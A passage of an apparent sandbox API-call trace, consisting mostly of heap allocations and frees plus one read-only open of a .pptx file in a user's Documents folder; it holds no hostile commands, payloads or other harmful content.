(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0077.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0077.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0077.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0077.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0077.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0077.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0077.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0077.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0077.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0077.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0077.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0077.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0077.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0077.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0077.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0077.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0077.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0077.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0077.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0077.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0077.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0077.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0077.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0077.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0077.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0077.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0077.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0077.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0077.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0077.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0077.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0077.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0077.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0077.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0077.127] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0077.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0077.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0077.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0077.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0077.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0077.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0077.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0077.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0077.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0077.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0077.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0077.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0077.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0077.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0077.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0077.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0077.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0077.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0077.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0077.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0077.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0077.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0077.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0077.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0077.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0077.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0077.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0077.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0077.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0077.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0077.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0077.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0077.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0077.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca748 [0077.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca748, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0077.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0077.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0077.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0077.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0077.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0077.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0077.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0077.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0077.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0077.129] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\nDdxnatd.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\nddxnatd.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0077.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0077.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0077.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0077.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0077.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0077.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0077.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0077.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0077.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a558 [0077.130] FreeLibrary (hLibModule=0x772d0000) returned 1 [0077.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0077.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0077.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0077.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0077.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0077.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0077.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0077.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0077.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0077.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0077.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0077.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0077.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0077.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0077.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0077.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0077.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0077.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0077.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0077.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0077.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0077.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0077.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0077.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0077.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0077.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0077.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0077.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0077.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0077.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.132] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0077.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0077.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0077.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.132] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0077.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0077.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0077.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0077.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0077.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0077.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0077.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0077.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0077.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0077.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0077.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.133] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0077.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0077.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0077.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0077.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0077.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0077.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0077.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0077.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0077.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0077.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0077.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0077.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0077.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0077.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0077.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0077.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0077.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a558 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0077.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0077.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0077.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0077.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0077.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0077.135] HeapFree (in: hHeap=0x1780000, 